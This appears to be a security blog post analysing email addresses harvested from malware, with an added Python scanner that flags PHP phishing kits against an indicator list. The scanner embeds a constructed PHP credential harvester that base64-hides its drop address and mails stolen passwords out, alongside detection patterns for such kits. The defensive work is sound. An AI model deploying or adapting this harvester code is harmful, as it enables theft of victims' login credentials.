An Analysis of 3,000 Malware Email Addresses
While analyzing malware 24/7, we decided to continue our collection of email addresses found in malicious code. With the help of SiteLock's Sig Q Team we tripled our existing collection of malware email addresses to over 3,000. Looking at the data we get to see the preferred email providers of phishers, keywords in malicious email addresses, and the spoofed From: addresses used by bad actors. Finally, we capitalized on a test address and an unregistered domain to get a look inside the end of the phishing process.
The full list of 3,060 email addresses is on GitHub and can be used as indicators of compromise, particularly for website security. The list mainly consists of phishing addresses, with addresses from web shells, defacements, and other miscellaneous files rounding out the 3,000.
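As an added, defender-side example that is not from the SiteLock post or its GitHub list: a small Python scanner that uses such an address list as website IoCs. It checks a PHP file for the two halves of the credential harvester described next (reading a password field from the request, then mailing it out), extracts any email address in the file, including one hidden inside a `base64_decode()` literal as kits often do, and matches the results against the list. `IOC_LIST`, both PHP samples and every function name here are constructed for this example; only hopful101@zoho[.]com is taken from the post.

```python
import base64
import re

# Constructed IoC list: a stand-in for the 3,060-address GitHub list the post
# describes. hopful101@zoho[.]com is the one address the post names; the other
# entries are made-up samples. Entries may be defanged with "[.]" as feeds often are.
IOC_LIST = [
    "hopful101@zoho[.]com",
    "results.drop@example[.]net",  # constructed
    "shell-owner@example[.]org",   # constructed
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# PHP calls that send mail: the "send to the attacker's address" half of a harvester
MAIL_CALL_RE = re.compile(r"\b(?:mail|mb_send_mail)\s*\(", re.IGNORECASE)
# Reads of a password-like form field: the "collect credentials" half
PASSWORD_READ_RE = re.compile(
    r"""\$_(?:POST|REQUEST|GET)\s*\[\s*['"](?:pass(?:word|wd)?|pwd)['"]""", re.IGNORECASE)
# String literal handed to base64_decode(); kits often hide the drop address this way
B64_LITERAL_RE = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def refang(addr):
    """Normalise a (possibly defanged) address so list entries and code hits compare equal."""
    return addr.replace("[.]", ".").replace("(.)", ".").strip().lower()


def load_iocs(entries):
    """Build the lookup set from raw list entries (defanged or not)."""
    return {refang(e) for e in entries}


def extract_emails(php_source):
    """Addresses visible in the source, plus any recovered from base64_decode('...') literals."""
    found = {m.lower() for m in EMAIL_RE.findall(php_source)}
    for literal in B64_LITERAL_RE.findall(php_source):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        found.update(m.lower() for m in EMAIL_RE.findall(decoded))
    return found


def scan_php(php_source, iocs):
    """Classify one PHP file: known-bad (address on the IoC list), suspicious
    (harvester shape with an unlisted address) or clean."""
    emails = extract_emails(php_source)
    known_bad = sorted(emails & iocs)
    harvests = bool(PASSWORD_READ_RE.search(php_source))
    sends = bool(MAIL_CALL_RE.search(php_source))
    if known_bad:
        verdict = "known-bad"      # listed drop address: treat as an infection
    elif harvests and sends:
        verdict = "suspicious"     # harvester shape, unlisted address: needs review
    else:
        verdict = "clean"
    return {"emails": sorted(emails), "known_bad": known_bad,
            "reads_password": harvests, "sends_mail": sends, "verdict": verdict}


# Constructed sample in the style of the harvester the post describes; the drop
# address is base64-encoded so a plain grep for "@" would miss it.
SAMPLE_HARVESTER = r'''<?php
$email = $_POST['email'];
$password = $_POST['password'];
$message = "Email: " . $email . "\nPassword: " . $password . "\nIP: " . $_SERVER['REMOTE_ADDR'];
$recipient = base64_decode("aG9wZnVsMTAxQHpvaG8uY29t");
mail($recipient, "New Login", $message);
header("Location: https://example.com/login");
?>'''

# Constructed benign contact form: it mails form input too, but reads no password field.
SAMPLE_CONTACT_FORM = r'''<?php
$name = $_POST['name'];
$from = $_POST['email'];
$body = $_POST['message'];
mail("webmaster@example.com", "Contact form from " . $name, $body, "Reply-To: " . $from);
?>'''

if __name__ == "__main__":
    iocs = load_iocs(IOC_LIST)
    for label, src in (("harvester", SAMPLE_HARVESTER), ("contact form", SAMPLE_CONTACT_FORM)):
        print(label, scan_php(src, iocs))
```

The "known-bad" verdict is the only one that rests on the list itself; "suspicious" is a review cue, since a legitimate login helper can read a password field and send mail. Decoding `base64_decode()` literals matters in practice because a kit whose address is encoded leaves no matchable string for a raw grep over the webroot.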
The majority of email addresses were collected from phishing infections -- disposable email addresses used to receive pilfered credentials. Below is an example of a phishing infection. It's a PHP file written or uploaded to a site that collects unwary victims' email addresses and passwords and sends them to the malicious actor's email address, hopful101@zoho[.]com.